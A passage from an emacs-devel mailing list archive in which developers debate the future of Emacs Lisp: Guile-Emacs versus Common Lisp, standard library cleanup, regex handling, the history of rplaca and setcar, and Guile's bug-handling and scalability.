extensions in Scheme", but I'm not sure defining Emacs as "this editor that comes with N extensions languages" is a good idea. One of the main reasons for Emacs's enduring success is its large set of third party packages so obviously we can't drop support for Elisp any time soon. And as much as I like Scheme, I'm very much unconvinced that it's really so much better that it's worth converting packages from Elisp to Scheme. So if we go for Guile-Emacs, we'll be stuck with Guile, i.e. we'd have (old and new) packages that use Elisp, new packages that use Scheme, maybe yet other new packages that use, say, Javascript (or some other language support by Guile). That would make the work of Emacs (and GNU ELPA) maintenance harder. And of course, if Guile's own manpower dries up, Emacs would be forced to keep supporting Guile, which is more work than supporting just Elisp. So, I think that ideally, we'd want to stick to Elisp, or some evolution thereof. Sadly, I don't see how to evolve Elisp into Scheme: they are closely related languages, but the differences are large enough that it seems hard to reconcile them. The only standard language into which Elisp can evolve, AFAICT, is Common Lisp. [ Now some readers get disappointed, while some others become excited. ] There are some incompatibilities between the two languages, but I can imagine working them out over the years, or even living with them without too much trouble, such that we could use Common-Lisp libraries in Emacs. Of course, that's for the language side, but on the implementation side, I don't really know what Common-Lisp implementation we could re-use (both GNU implementations are dormant, so there's no manpower for us tap into). Still: there are many Common-Lisp implementations out there, so there's probably one that could work for us. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future (was: Guile emacs thread (again)) 2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier @ 2014-09-16 16:03 ` Lennart Borgman 2014-09-17 18:24 ` Jorgen Schaefer 2014-09-16 16:54 ` Emacs Lisp's future (was: Guile emacs thread (again)) Lars Brinkhoff ` (7 subsequent siblings) 8 siblings, 1 reply; 404+ messages in thread From: Lennart Borgman @ 2014-09-16 16:03 UTC (permalink / raw) To: Stefan Monnier; +Cc: Christopher Allan Webber, Emacs-Devel devel [-- Attachment #1: Type: text/plain, Size: 582 bytes --] On Tue, Sep 16, 2014 at 5:50 PM, Stefan Monnier <monnier@iro.umontreal.ca> wrote: > The main problems I see with that: > - Elisp is slow and as CPUs aren't getting faster, its slowness makes > itself > noticed more often. > - Lack of some features, most notably FFI and concurrency. > - Lack of manpower. > Perhaps also the lack of possibility to enhance Emacs with code written in other languages? I think for example that Javascript will be something most future programmers will know. Could Guile make it easier to enhance Emacs with Javascript (as an alternative to Elisp)? [-- Attachment #2: Type: text/html, Size: 1152 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future (was: Guile emacs thread (again)) 2014-09-16 16:03 ` Lennart Borgman @ 2014-09-17 18:24 ` Jorgen Schaefer 2014-09-17 18:42 ` Emacs Lisp's future Lars Brinkhoff ` (2 more replies) 0 siblings, 3 replies; 404+ messages in thread From: Jorgen Schaefer @ 2014-09-17 18:24 UTC (permalink / raw) To: emacs-devel On Tue, 16 Sep 2014 18:03:17 +0200 Lennart Borgman <lennart.borgman@gmail.com> wrote: > On Tue, Sep 16, 2014 at 5:50 PM, Stefan Monnier > <monnier@iro.umontreal.ca> wrote: > > > The main problems I see with that: > > - Elisp is slow and as CPUs aren't getting faster, its slowness > > makes itself > > noticed more often. > > - Lack of some features, most notably FFI and concurrency. > > - Lack of manpower. > > > > Perhaps also the lack of possibility to enhance Emacs with code > written in other languages? I think for example that Javascript will > be something most future programmers will know. Could Guile make it > easier to enhance Emacs with Javascript (as an alternative to Elisp)? I think the (often-cited, not just here) idea of supporting multiple languages is a red herring, mostly. Every extension language supported adds some burden on those who want to understand what their editor does, not just use pre-packaged code. One of the great things about Emacs is that, once I know ELisp, I have a good chance of understanding and modifying any extension I see. And learning Emacs Lisp is not exactly hard. But we do not have to be all theoretical here. There is an editor which supports a dozen extension languages. The paradoxical thing to notice when you look at vim plugins is that most of them are written in VimL, including rather complex ones like NERD-tree and fugitive. I'd argue that VimL is a tiny bit harder to learn and use than ELisp. There are various reasons for why most plugins are written in it, but I do think that this is a pretty good indicator that the lack of "common" languages for extension is not exactly high on the list of problems for an editor. There are plenty of things in ELisp itself that I'd put much higher on that list. - Lack of a common structured datatype. While there's cl-defstruct, the support is a bit limited (C-h f does not work well with it), and a lot of code simply does not use it, making it seem a bit like a red-haired stepchild instead of a core recommended language feature. Alists and plists are usually used where modern languages would use structured datatypes, or even some hack with cons cells or lists and indexed access. - Hashes are one of those data types that are used all over the place in other languages, but you see them rarely in Emacs Lisp, again often losing out to alists and plists. This might be related to the standard library functions being a bit baroque. (There's some third-party hash library somewhere.) - Speaking of third-party libraries, s.el, dash.el and f.el provide things that really ought to be in core Emacs. - The regex engine is annoying to use. Providing some interface to PCRE would be a great step forward, and does not even have to be backwards-incompatible. - There are tons of warts in Emacs Lisp. nth vs. elt for example, with their exciting incompatible calling conventions. One thing I think would benefit Emacs Lisp as a language a lot would be a standard library cleanup. An effort to go through the libraries that come with Emacs, separate them into "standard library" and "extensions that come with Emacs", and then go through the "standard library", provide sane names when necessary (like setcar is provided for rplaca) and deprecating the old ones, or simply deprecate all but one version of functions with overlapping use (nth or elt, pick one). Finally, add standard libraries for common functionality that is currently lacking (see above). The next step would be going through the "extensions that come with Emacs" and make sure they all use namespace prefixes for anything but very specific commands meant for users to use with M-x. Only standard library functions are allowed to be namespace-free. These things would make Emacs Lisp a lot easier to use and also easier to learn for new users. This is all doable, but it needs manpower (#3 on Stefans list). Which is manpower that would not be doing other cool stuff on Emacs. Regards, Jorgen ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 18:24 ` Jorgen Schaefer @ 2014-09-17 18:42 ` Lars Brinkhoff 2014-09-18 2:07 ` Emacs Lisp's future (was: Guile emacs thread (again)) Alexis 2014-09-18 6:35 ` Andreas Röhler 2 siblings, 0 replies; 404+ messages in thread From: Lars Brinkhoff @ 2014-09-17 18:42 UTC (permalink / raw) To: emacs-devel Jorgen Schaefer <forcer@forcix.cx> writes: > - Lack of a common structured datatype. That was what I was saying a year ago. My offer to work on this still stands. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future (was: Guile emacs thread (again)) 2014-09-17 18:24 ` Jorgen Schaefer 2014-09-17 18:42 ` Emacs Lisp's future Lars Brinkhoff @ 2014-09-18 2:07 ` Alexis 2014-09-18 16:40 ` Emacs Lisp's future Daniel Colascione 2014-09-18 6:35 ` Andreas Röhler 2 siblings, 1 reply; 404+ messages in thread From: Alexis @ 2014-09-18 2:07 UTC (permalink / raw) To: emacs-devel Jorgen Schaefer writes: > I think the (often-cited, not just here) idea of supporting multiple > languages is a red herring, mostly. Every extension language supported > adds some burden on those who want to understand what their editor > does, not just use pre-packaged code. One of the great things about > Emacs is that, once I know ELisp, I have a good chance of > understanding and modifying any extension I see. +1. It seems to me that much discussion around this issue focuses on being able to use one's favourite language to extend Emacs, without considering what it might be like to: * start using an extension that seems like it might significantly assist one's productivity; * find a show-stopping bug in it; and * discover that the extension is written in a programming language one loves to loathe. Also, to an (admittedly very limited) extent, it's /already/ possible to use a number of languages other than ELisp in Emacs, for at least some things, via org-babel: http://orgmode.org/manual/Evaluating-code-blocks.html#Evaluating-code-blocks A list of languages currently supported by org-babel can be found at: http://orgmode.org/manual/Languages.html#Languages i would be interested to know what experiences people might have had in using org-babel as part of an Emacs extension .... > Speaking of third-party libraries, s.el, dash.el and f.el provide > things that really ought to be in core Emacs. Agreed. i've found it quite surprising that simple functions like -flatten and s-repeat aren't available in ELisp by default. > The regex engine is annoying to use. Providing some interface to PCRE > would be a great step forward, and does not even have to be > backwards-incompatible. i like this suggestion. i'm rather comfortable with Perl5 REs, and can find myself frustrated trying to create REs in ELisp. Having said that, the issue is not usually the syntax of ELisp REs per se (e.g. needing to escape things like capturing parentheses or the alternatives pipe); it's needing to escape various things /further/ because REs can only be specified in the form of a standard ELisp string. On several occasions i've ended up using a combination of pcre-to-elisp and re-builder to try to work out if the problem is too few backslashes, too many backslashes, or both. Alexis. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 2:07 ` Emacs Lisp's future (was: Guile emacs thread (again)) Alexis @ 2014-09-18 16:40 ` Daniel Colascione 0 siblings, 0 replies; 404+ messages in thread From: Daniel Colascione @ 2014-09-18 16:40 UTC (permalink / raw) To: Alexis, emacs-devel [-- Attachment #1: Type: text/plain, Size: 676 bytes --] On 09/17/2014 07:07 PM, Alexis wrote: > i like this suggestion. i'm rather comfortable with Perl5 REs, and can > find myself frustrated trying to create REs in ELisp. Having said that, > the issue is not usually the syntax of ELisp REs per se (e.g. needing to > escape things like capturing parentheses or the alternatives pipe); it's > needing to escape various things /further/ because REs can only be > specified in the form of a standard ELisp string. On several occasions > i've ended up using a combination of pcre-to-elisp and re-builder to try > to work out if the problem is too few backslashes, too many backslashes, > or both. That's why we have rx. [-- Attachment #2: OpenPGP digital signature --] [-- Type: application/pgp-signature, Size: 819 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 18:24 ` Jorgen Schaefer 2014-09-17 18:42 ` Emacs Lisp's future Lars Brinkhoff 2014-09-18 2:07 ` Emacs Lisp's future (was: Guile emacs thread (again)) Alexis @ 2014-09-18 6:35 ` Andreas Röhler 2014-09-18 15:17 ` Richard Stallman 2 siblings, 1 reply; 404+ messages in thread From: Andreas Röhler @ 2014-09-18 6:35 UTC (permalink / raw) To: emacs-devel On 17.09.2014 20:24, Jorgen Schaefer wrote: > On Tue, 16 Sep 2014 18:03:17 +0200 > Lennart Borgman <lennart.borgman@gmail.com> wrote: [ ... ] > One thing I think would benefit Emacs Lisp as a language a lot would be > a standard library cleanup. An effort to go through the libraries that > come with Emacs, separate them into "standard library" and "extensions > that come with Emacs", and then go through the "standard library", > provide sane names when necessary (like setcar is provided for rplaca) > and deprecating the old ones, or simply deprecate all but one version of > functions with overlapping use (nth or elt, pick one). Finally, add > standard libraries for common functionality that is currently lacking > (see above). > [ ... ] +1 ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 6:35 ` Andreas Röhler @ 2014-09-18 15:17 ` Richard Stallman 2014-09-18 16:19 ` Ivan Andrus 0 siblings, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-09-18 15:17 UTC (permalink / raw) To: Andreas Röhler; +Cc: emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > provide sane names when necessary (like setcar is provided for rplaca) setcar is not entirely equivalent to rplaca -- they return different values. That's why I gave it a different name. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 15:17 ` Richard Stallman @ 2014-09-18 16:19 ` Ivan Andrus 2014-09-18 23:19 ` Richard Stallman 2014-09-19 8:10 ` Andreas Schwab 0 siblings, 2 replies; 404+ messages in thread From: Ivan Andrus @ 2014-09-18 16:19 UTC (permalink / raw) To: rms@gnu.org; +Cc: Andreas Röhler, emacs-devel@gnu.org List [-- Attachment #1: Type: text/plain, Size: 655 bytes --] On Sep 18, 2014, at 9:17 AM, Richard Stallman <rms@gnu.org> wrote: [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] provide sane names when necessary (like setcar is provided for rplaca) setcar is not entirely equivalent to rplaca -- they return different values. That's why I gave it a different name. That appears to no longer be true (emacs-24 branch): rplaca is an alias for `setcar' in `subr.el'. (rplaca CELL NEWCAR) Set the car of CELL to be NEWCAR. Returns NEWCAR. -Ivan [-- Attachment #2: Type: text/html, Size: 941 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 16:19 ` Ivan Andrus @ 2014-09-18 23:19 ` Richard Stallman 2014-09-19 7:18 ` Andreas Röhler 2014-09-19 8:10 ` Andreas Schwab 1 sibling, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-09-18 23:19 UTC (permalink / raw) To: Ivan Andrus; +Cc: andreas.roehler, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] That appears to no longer be true (emacs-24 branch): rplaca is an alias for `setcar' in `subr.el'. (rplaca CELL NEWCAR) Set the car of CELL to be NEWCAR. Returns NEWCAR. If I recall right, rplaca traditionally returned CELL, not NEWCAR. Thus, this change seems like an error. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 23:19 ` Richard Stallman @ 2014-09-19 7:18 ` Andreas Röhler 0 siblings, 0 replies; 404+ messages in thread From: Andreas Röhler @ 2014-09-19 7:18 UTC (permalink / raw) To: rms, Ivan Andrus; +Cc: Jorgen Schaefer, Stefan Monnier, emacs-devel On 19.09.2014 01:19, Richard Stallman wrote: > [[[ To any NSA and FBI agents reading my email: please consider ]]] > [[[ whether defending the US Constitution against all enemies, ]]] > [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > That appears to no longer be true (emacs-24 branch): > > rplaca is an alias for `setcar' in `subr.el'. > > (rplaca CELL NEWCAR) > > Set the car of CELL to be NEWCAR. Returns NEWCAR. > > If I recall right, rplaca traditionally returned CELL, not NEWCAR. > Thus, this change seems like an error. > Hi Richard, IIUC this was just an example. Once mentioned a multitude of string-strip functions, used to remove whitespace-characters from beginning or end of string - while missing a canoncial form. Maybe past upcoming release discuss the standard library should pay. Best, Andreas ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 16:19 ` Ivan Andrus 2014-09-18 23:19 ` Richard Stallman @ 2014-09-19 8:10 ` Andreas Schwab 2014-09-19 8:46 ` David Kastrup 1 sibling, 1 reply; 404+ messages in thread From: Andreas Schwab @ 2014-09-19 8:10 UTC (permalink / raw) To: Ivan Andrus; +Cc: Andreas Röhler, rms@gnu.org, emacs-devel@gnu.org List Ivan Andrus <darthandrus@gmail.com> writes: > On Sep 18, 2014, at 9:17 AM, Richard Stallman <rms@gnu.org> wrote: > > setcar is not entirely equivalent to rplaca -- they return different > values. That's why I gave it a different name. > > > That appears to no longer be true (emacs-24 branch): For some value of "no longer". Changes in Emacs 1.6 * rplaca is now a synonym for setcar, and rplacd for setcdr. eql is now a synonym for eq; it turns out that the Common Lisp distinction between eq and eql is insignificant in Emacs. numberp is a new synonym for integerp. Andreas. -- Andreas Schwab, schwab@linux-m68k.org GPG Key fingerprint = 58CA 54C7 6D53 942B 1756 01D3 44D5 214B 8276 4ED5 "And now for something completely different." ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-19 8:10 ` Andreas Schwab @ 2014-09-19 8:46 ` David Kastrup 0 siblings, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-09-19 8:46 UTC (permalink / raw) To: emacs-devel Andreas Schwab <schwab@linux-m68k.org> writes: > Ivan Andrus <darthandrus@gmail.com> writes: > >> On Sep 18, 2014, at 9:17 AM, Richard Stallman <rms@gnu.org> wrote: >> >> setcar is not entirely equivalent to rplaca -- they return different >> values. That's why I gave it a different name. >> >> >> That appears to no longer be true (emacs-24 branch): > > For some value of "no longer". > > Changes in Emacs 1.6 > > * rplaca is now a synonym for setcar, and rplacd for setcdr. > eql is now a synonym for eq; it turns out that the Common Lisp > distinction between eq and eql is insignificant in Emacs. > numberp is a new synonym for integerp. Well, the other changes have not survived when Emacs gained floating point numbers. Version 19.0 or so? -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future (was: Guile emacs thread (again)) 2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier 2014-09-16 16:03 ` Lennart Borgman @ 2014-09-16 16:54 ` Lars Brinkhoff 2014-09-17 15:14 ` Emacs Lisp's future Stefan Monnier 2014-09-16 16:59 ` David Kastrup ` (6 subsequent siblings) 8 siblings, 1 reply; 404+ messages in thread From: Lars Brinkhoff @ 2014-09-16 16:54 UTC (permalink / raw) To: emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: > The only standard language into which Elisp can evolve, AFAICT, is > Common Lisp. [ Now some readers get disappointed, while some others > become excited. ] Excited. > [...] we could use Common-Lisp libraries in Emacs. That's almost possible already, because there is a Common Lisp implementation (say 90% complete) for Emacs, including a compiler from CL to Elisp. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-16 16:54 ` Emacs Lisp's future (was: Guile emacs thread (again)) Lars Brinkhoff @ 2014-09-17 15:14 ` Stefan Monnier 2014-09-17 16:57 ` Lars Brinkhoff 0 siblings, 1 reply; 404+ messages in thread From: Stefan Monnier @ 2014-09-17 15:14 UTC (permalink / raw) To: Lars Brinkhoff; +Cc: emacs-devel > That's almost possible already, because there is a Common Lisp > implementation (say 90% complete) for Emacs, including a compiler from > CL to Elisp. Compiling from CL to Elisp means that the two aren't integrated, so calling code from one to the other is not seamless. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 15:14 ` Emacs Lisp's future Stefan Monnier @ 2014-09-17 16:57 ` Lars Brinkhoff 0 siblings, 0 replies; 404+ messages in thread From: Lars Brinkhoff @ 2014-09-17 16:57 UTC (permalink / raw) To: Stefan Monnier; +Cc: emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: > Compiling from CL to Elisp means that the two aren't integrated, so > calling code from one to the other is not seamless. I don't know why you say that. In my implementation it's currently not entirely seamless, but close, and I can easily imagine ways to make it so. But anyway, this is not the time nor the place to discuss that. It's not really relevant to what you wrote about Emacs Lisp's future. Sorry for the noise. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier 2014-09-16 16:03 ` Lennart Borgman 2014-09-16 16:54 ` Emacs Lisp's future (was: Guile emacs thread (again)) Lars Brinkhoff @ 2014-09-16 16:59 ` David Kastrup 2014-09-16 22:58 ` Mark H Weaver 2014-09-17 5:04 ` mhw 2014-09-17 10:48 ` Lars Magne Ingebrigtsen ` (5 subsequent siblings) 8 siblings, 2 replies; 404+ messages in thread From: David Kastrup @ 2014-09-16 16:59 UTC (permalink / raw) To: emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: >> So this email is partly a: >> - What now? What's the chance of work towards guilemacs moving over to >> an official emacs git branch, and that port happening, anytime soon? >> - Is anyone running it? How's it going for you? > > Good questions. I've had the opportunity to think a bit more about > Emacs Lisp and its possible evolution and I'm still not sure what to > think about it. > > I see a few different options for Emacs Lisp. > > First, of course we can keep on evolving Elisp on its own. This has > worked OK for the last 30 years, so it's not such a terrible choice. > The main problems I see with that: > - Elisp is slow and as CPUs aren't getting faster, its slowness makes itself > noticed more often. > - Lack of some features, most notably FFI and concurrency. > - Lack of manpower. > > This last point is for me the strongest motivation to try and move to > some other system, where we could use other people's work. > > One such option is Guile-Emacs. This presumably would give us a faster > implementation (at least in theory, their bytecode is significantly > more efficient), would give us an FFI, and would give us more manpower > since we'd be benefiting from the work done on Guile. That's not all that much manpower. If you take a look at the commits in the master branch that are not merges from the stable branch, I think that more than 90% are from Andy Wingo. And the turnaround times on the issue tracker are not all that impressive. It doesn't help that Andy does not generally bother with the bug tracker, so most bugs actually having a chance of getting fixed are those in the stable branch. > Note that while Guile does come with support for threading, <URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=14756> Bug report about basic threading functionality not working, no response since June 2013. > it doesn't immediately let us use concurrency in Guile-Emacs, because > of all the issues of synchronizing access to shared data, with all the > existing Emacs code (both C and Elisp) assuming that this problem > doesn't exist. IOW, language support for concurrency is just a first > step on the way to letting Emacs Lisp use concurrency. Bug report about basic list functionality not working for lists of more than 10009 members: <URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=17485> The proposed fix is rejected, but no alternative fix is done. <URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=13101> is an example for the inability to compile large expressions on Guile-2.0. The basic resume for this bug is "large expressions like that will only work with Guile-2.2+", but since Guile-2.2 is pretty much a one-person venture, it is very unclear how it will ever be suitable for a "stable release". > Another detail that needs to be spelled out is the difference between > the language and its implementation. Guile-Emacs provides 2 > languages: Emacs Lips and Scheme (well, it also provides a few more, > but that's not important). It might very well become important if it leads to Emacs extensibility in more procedural-syntax languages like Lua (the data model and basic application of Emacs does not really call for functional programming, so a functional programming language has no real advantage). I see that as mostly pie-in-the-sky material right now since getting Scheme right and finding a workable balance between code complexity, performance, scalability and reliability of the basic feature set seems more important to focus on before fanning out. But it is an interesting long-term perspective. > One of the main reasons for Emacs's enduring success is its large set > of third party packages so obviously we can't drop support for Elisp > any time soon. And as much as I like Scheme, I'm very much > unconvinced that it's really so much better that it's worth converting > packages from Elisp to Scheme. Scheme is not "better" than Elisp but it's certainly more standardized. Since it is mostly employed for other tasks, code reusability for Emacs will not be much of an ongoing advantage in practice. I mean, how did the Common Lisp based Emacs clone Hemlock fare? I think nobody remembers it any more. > So if we go for Guile-Emacs, we'll be stuck with Guile, i.e. we'd have > (old and new) packages that use Elisp, new packages that use Scheme, > maybe yet other new packages that use, say, Javascript (or some other > language support by Guile). That would make the work of Emacs (and > GNU ELPA) maintenance harder. > > And of course, if Guile's own manpower dries up, Emacs would be forced > to keep supporting Guile, which is more work than supporting just > Elisp. And its dark corners are in areas entirely foreign to text editing. > So, I think that ideally, we'd want to stick to Elisp, or some > evolution thereof. Sadly, I don't see how to evolve Elisp into > Scheme: they are closely related languages, but the differences are > large enough that it seems hard to reconcile them. The main road to a common effort/codebase would be a common VM and byte code I think. The Guile compiler is layered, so one could hug the Elisp byte compiler into a Guile compiler level considerably more remote from the low-level machine than the VM and basically use all of its compiler/optimizer structure without prescribing the high-level language. I think that this is the basic Emacs-Guile approach and it would make it reasonably easy to extend Emacs with either Elisp or Scheme without really having the languages merge in any manner. I think that the basic idea is quite workable. What I doubt is that the GUILE project will readily scale to accommodate Emacs. We've seen a lot of growing pains when Emacs jumped on board of Bazaar, a project unprepared for the challenges of a project of Emacs' size with regard to both computational and social scalability. Moving the responsibility for the Emacs low-level language layer and management (for example, byte-compiled files will be created and managed on disk by GUILE, and I am not convinced that GUILE is even close to prepared to deal with a code base and add-on packages on the scale of a typical Emacs-plus-extensions, plus multiple versions and installations) into a different project will be a quite larger challenge and rather permanent commitment than Bazaar was. Given the current size of GUILE, this would require quite a large leap of faith for which I see no return jump. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-16 16:59 ` David Kastrup @ 2014-09-16 22:58 ` Mark H Weaver 2014-09-16 23:10 ` Mark H Weaver 2014-09-17 13:55 ` David Kastrup 2014-09-17 5:04 ` mhw 1 sibling, 2 replies; 404+ messages in thread From: Mark H Weaver @ 2014-09-16 22:58 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > Bug report about basic list functionality not working for lists of more > than 10009 members: > > <URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=17485> One of our procedures has a scalability problem. Summarizing this as "basic list functionality not working for lists of more than 10009 members" is a gross misrepresentation. I responded within a day or so, and we had a conversation over the next few days, but quickly ran into the problem that you wanted to change one of our other API procedures in a non-standard way that conflicts with our existing behavior, and you simply wouldn't take "no" for an answer. > The proposed fix is rejected, but no alternative fix is done. I would be glad to fix the problem myself, but I was hoping that you would adapt your patch without changing that other API procedure, so that you would get credit for your work. > <URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=13101> is an example > for the inability to compile large expressions on Guile-2.0. The basic > resume for this bug is "large expressions like that will only work with > Guile-2.2+" Is it really a show-stopper that Guile 2.0 has limitations in the sizes of some expression types? Even C has similar limitations, and yet somehow it seems to be successful. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-16 22:58 ` Mark H Weaver @ 2014-09-16 23:10 ` Mark H Weaver 2014-09-17 13:55 ` David Kastrup 1 sibling, 0 replies; 404+ messages in thread From: Mark H Weaver @ 2014-09-16 23:10 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel Mark H Weaver <mhw@netris.org> writes: > David Kastrup <dak@gnu.org> writes: > >> Bug report about basic list functionality not working for lists of more >> than 10009 members: >> >> <URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=17485> > > One of our procedures has a scalability problem. Summarizing this as > "basic list functionality not working for lists of more than 10009 > members" is a gross misrepresentation. > > I responded within a day or so, and we had a conversation over the next > few days, but quickly ran into the problem that you wanted to change one > of our other API procedures in a non-standard way that conflicts with > our existing behavior, and you simply wouldn't take "no" for an answer. I should mention that most of the conversation we had regarding this other API procedure (length+) occurred within another bug report: http://bugs.gnu.org/17296 Although it may appear from bug #17485 that I failed to respond to your last messages, in fact the conversation had shifted to bug #17296 where you failed to respond to my reasons for rejecting your proposed change. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-16 22:58 ` Mark H Weaver 2014-09-16 23:10 ` Mark H Weaver @ 2014-09-17 13:55 ` David Kastrup 2014-09-17 15:19 ` Mark H Weaver 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-17 13:55 UTC (permalink / raw) To: Mark H Weaver; +Cc: emacs-devel Mark H Weaver <mhw@netris.org> writes: > David Kastrup <dak@gnu.org> writes: > >> Bug report about basic list functionality not working for lists of more >> than 10009 members: >> >> <URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=17485> > > One of our procedures has a scalability problem. Summarizing this as > "basic list functionality not working for lists of more than 10009 > members" is a gross misrepresentation. It's "drop-right" in srfi-1, the basic list processing library. 10009 is a typo, it's actually somewhere between 1000 and 10000 that GUILE bombs out. drop-right is basic enough that it is used in the implementation of reduce-right, propagating the scalability problem. I don't see it as a gross misrepresentation, but haggling about that would be missing the point anyway. > I responded within a day or so, and we had a conversation over the next > few days, but quickly ran into the problem that you wanted to change one > of our other API procedures in a non-standard way The "non-standard way" being the exact behavior of the Scheme reference implementation for srfi-1. > that conflicts with our existing behavior, and you simply wouldn't > take "no" for an answer. I gave up on this problem after pointing out that I saw no sensible solution within the restrictions you wanted to see implemented and I pointed that out. At any rate, all this is missing the point. The point was that GUILE is not a vibrant project at a scale that can comfortably absorb the impact of becoming Emacs' main Lisp engine. Becoming Emacs' main Lisp engine will require timely answers to limitations in the VM, compilers, library routines, and Scheme standard interpretation that turn out to affect Emacs operations and Lisp implementations. In particular, it will not be an option to flag errors for every operation that has no well-defined semantics in Scheme when the corresponding operation in Common Lisp or Elisp happens to be well-defined and needed. And parting ways again in case the cooperation turns out bad is entirely different from parting ways with Bazaar, since we are talking about replacing Emacs' internals here rather than an external tool. So the situation with GUILE-Emacs more or less can be characterized as: you can check it in any time you want but you can never leave it. >> <URL:http://debbugs.gnu.org/cgi/bugreport.cgi?bug=13101> is an >> example for the inability to compile large expressions on Guile-2.0. >> The basic resume for this bug is "large expressions like that will >> only work with Guile-2.2+" > > Is it really a show-stopper that Guile 2.0 has limitations in the > sizes of some expression types? Semantic compiles grammars into code. "some expression types" in that bug report is a large "cond" statement, exactly the kind of thing a typical action-annotated grammar will be compiled into by a parser generator. GUILE compiles a cond statement into nested if statements. The VM does not offer any other renditions of conditionals, so _every_ way of expressing this function in terms of an open-coded block of code rather than, say, tables containing closures, will fail compilation. Yes, this can turn into sort of a scalability problem in my book. And Emacs is big. > Even C has similar limitations, and yet somehow it seems to be > successful. C restricts the number of cases in a switch statement (which would be the rough equivalent here)? That's news to me. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 13:55 ` David Kastrup @ 2014-09-17 15:19 ` Mark H Weaver 2014-09-17 16:23 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Mark H Weaver @ 2014-09-17 15:19 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup <dak@gnu.org> writes: > Mark H Weaver <mhw@netris.org> writes: > >> I responded within a day or so, and we had a conversation over the next >> few days, but quickly ran into the problem that you wanted to change one >> of our other API procedures in a non-standard way > > The "non-standard way" being the exact behavior of the Scheme reference > implementation for srfi-1. *sigh*, must we repeat our discussion here on emacs-devel, when it's already in the bug tracker at http://bugs.gnu.org/17296 ? To summarize: the spec says it's an error to pass 'length+' an improper list. Guile has always returned #f in that case, and existing code may depend on that. You want to change it to return the number of pairs in the improper list. Yes, that's what the reference implementation does. I think it's too risky to change Guile's behavior in this case from one non-error to another non-error, because existing code may silently start misbehaving, and it would also cause things like (map + - * /) to return () without reporting any error. If you want to continue this discussion about 'length+', can you please respond to my last message at http://bugs.gnu.org/17296 instead of here? >> Is it really a show-stopper that Guile 2.0 has limitations in the >> sizes of some expression types? [...] > Yes, this can turn into sort of a scalability problem in my book. And > Emacs is big. The problem is fixed on the master branch, which is the only branch that supports guile-emacs anyway. So, why are limitations in Guile 2.0 relevant for guile-emacs? Incidentally, the 'drop-right' scalability problem you complain above above is also fixed on the master branch, and plenty of others. The reason is that our stacks are now automatically expanded as needed, limited only by the available memory, so we can now write recursive procedures in a natural way without ugly hacks to make them scalable. See http://wingolog.org/archives/2014/03/17/stack-overflow for more. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
